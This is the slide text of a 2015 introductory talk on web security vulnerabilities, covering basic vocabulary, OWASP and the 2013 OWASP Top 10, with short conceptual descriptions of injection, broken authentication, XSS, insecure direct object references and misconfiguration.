INTRODUCTION TO
SECURITY
VULNERABILITIES
Shirish Padalkar
VodQA, Hyderabad, December 2015
1
Slide 2
Slide 2 text
ABOUT ME
2
Slide 3
Slide 3 text
AGENDA
▫︎Some vocabulary
▫︎Introduction to OWASP
▫︎OWASP top 10
▫︎Some demos
▫︎Tools
▫︎References
3
Slide 4
Slide 4 text
4
VOCABULARY
Slide 5
Slide 5 text
5
VULNERABILITY
Slide 6
Slide 6 text
Vulnerability refers to the inability of a
system to withstand the effects of a
hostile environment.
6
Slide 7
Slide 7 text
In computer security:
A vulnerability is a weakness which
allows an attacker to reduce a system's
information assurance.
7
Slide 8
Slide 8 text
8
EXPLOIT
Slide 9
Slide 9 text
Exploit means to take advantage of
something for one's own end, especially
unethically or unjustifiably.
9
Slide 10
Slide 10 text
An exploit is a piece of software that
takes advantage of a bug or
vulnerability in order to cause
unintended behaviour to occur on
computer software or hardware
10
Slide 11
Slide 11 text
11
Slide 12
Slide 12 text
OWASP
▫︎Open Web Application Security Project
▫︎Not-for-profit charitable organisation
▫︎Focused on improving the security of software
▫︎All materials are available under a FOSS license
▫︎Currently has over 142 active projects
12
Slide 13
Slide 13 text
13
https://www.owasp.org
Slide 14
Slide 14 text
OWASP TOP 10
▫︎List of the 10 most critical web application security risks
▫︎A powerful awareness document
▫︎Reference document for project security analysis
▫︎Published at regular intervals
▫︎Approximately once in 3 years
▫︎Last published in 2013
14
Slide 15
Slide 15 text
OWASP TOP 10, 2013
1. Injection
2. Broken authentication and session management
3. Cross site scripting (XSS)
4. Insecure direct object references
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function level access control
8. Cross site request forgery (CSRF)
9. Using components with known vulnerability
10.Unvalidated redirects and forwards
15
Slide 16
Slide 16 text
OWASP TOP 10, 2013
1. Injection
2. Broken authentication and session management
3. Cross site scripting (XSS)
4. Insecure direct object references
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function level access control
8. Cross site request forgery (CSRF)
9. Using components with known vulnerability
10.Unvalidated redirects and forwards
16
Slide 17
Slide 17 text
17
INJECTION
Slide 18
Slide 18 text
INJECTION
▫︎SQL Injection
▫︎Most prevalent
▫︎Databases like Oracle, MySQL
▫︎NoSQL Injection
▫︎Comparatively recent
▫︎Databases like MongoDB
▫︎Command Injection
▫︎LDAP Injection
18
Slide 19
Slide 19 text
19
DEMO
Slide 20
Slide 20 text
INJECTION
20
Slide 21
Slide 21 text
INJECTION
21
Slide 22
Slide 22 text
22
BROKEN AUTHENTICATION
Slide 23
Slide 23 text
BROKEN AUTHENTICATION
▫︎Session ID in URL or in the referrer header
▫︎PHPSESSID
▫︎JSESSIONID
▫︎Unencrypted passwords in storage or transit
▫︎Login over HTTP
▫︎Email password in plain text (BSNL?)
▫︎Predictable session IDs
▫︎Reusing same session IDs
23
Slide 24
Slide 24 text
24
CROSS SITE SCRIPTING
Slide 25
Slide 25 text
CROSS SITE SCRIPTING (XSS)
▫︎Inject client-side script into pages viewed by other users
▫︎No HTML or Javascript escaping
▫︎Can steal cookies, change page location, etc.
▫︎Script executes with same permission as current page
25
Slide 26
Slide 26 text
XSS TYPES
▫︎Reflected
▫︎Non-persistent
▫︎The most common type
▫︎Is typically delivered via email or a neutral web site
▫︎Display a page of results for a user, without properly
sanitising the request.
▫︎Ex. Search result with search term without
sanitisation
26
Slide 27
Slide 27 text
XSS TYPES
▫︎Stored
▫︎Persistent
▫︎A more devastating variant
▫︎Permanently displayed on "normal" pages returned
to other users
▫︎Example: Online message boards / Forums, Post on
Facebook wall
27
Slide 28
Slide 28 text
28
DEMO
Slide 29
Slide 29 text
CROSS SITE SCRIPTING (XSS)
29
Slide 30
Slide 30 text
CROSS SITE SCRIPTING (XSS)
30
Slide 31
Slide 31 text
31
INSECURE DIRECT OBJECT REFERENCES
Slide 32
Slide 32 text
INSECURE DIRECT OBJECT REFERENCES
▫︎Actual name or key of an object when generating web
pages
▫︎Don’t verify the user is authorised for the target object
▫︎Attackers can easily manipulate parameter values to
access another object
▫︎http://photos.com/download.php?file=personal.jpg
▫︎http://mybank.com/accountInfo?accNumber=123456
32
Slide 33
Slide 33 text
33
SECURITY MISCONFIGURATION
Slide 34
Slide 34 text
SECURITY MISCONFIGURATION
▫︎Running the application with debug enabled in
production.
▫︎Directory listing enabled on the server
▫︎Running outdated software
▫︎Unnecessary services running on the machine
▫︎Not changing default keys and passwords
▫︎Revealing error handling information to the attackers,
such as stack traces.
34
Slide 35
Slide 35 text
OWASP TOP 10, 2013
1. Injection
2. Broken authentication and session management
3. Cross site scripting (XSS)
4. Insecure direct object references
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function level access control
8. Cross site request forgery (CSRF)
9. Using components with known vulnerability
10.Unvalidated redirects and forwards
35